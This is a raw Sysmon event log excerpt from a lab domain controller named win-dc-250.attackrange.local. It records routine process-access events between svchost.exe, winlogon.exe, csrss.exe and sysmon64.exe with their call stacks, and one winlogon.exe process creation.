13:29:52.842{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+237c4|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009369Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.842{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009368Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.842{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009367Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.842{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009366Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.842{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009365Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.842{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009364Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.842{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009363Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.842{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009362Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.842{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009361Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.842{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009360Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.826{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0205-000000009A01}4788C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000009359Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.826{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000009358Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.826{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000009357Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.826{08A6967A-4750-6000-0105-000000009A01}22003888C:\Windows\System32\smss.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x80000000000000009356Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.835{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\System32\winlogon.exe10.0.14393.3204 (rs1_release.190830-1500)Windows Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWINLOGON.EXEwinlogon.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e72SystemMD5=DEA4CE12F24601830083126E18A2C7C9,SHA256=F002F8C2EA49D21F242996E3D57F5FDD7995FE6DB524BB69BBD7F190CC0211A9,IMPHASH=3CF10D94C117DB4F6E9D523B93429D6D{08A6967A-4750-6000-0105-000000009A01}2200C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000f8 0000007c 10341000x80000000000000009355Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.826{08A6967A-4284-6000-0200-000000009A01}452992C:\Windows\System32\smss.exe{08A6967A-4750-6000-0205-000000009A01}4788C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009354Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.826{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0205-000000009A01}4788C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009353Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.795{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009352Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.795{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009351Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.795{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009350Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.795{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009349Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.795{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009348Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.795{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009347Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.795{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009346Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.795{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009345Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.795{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 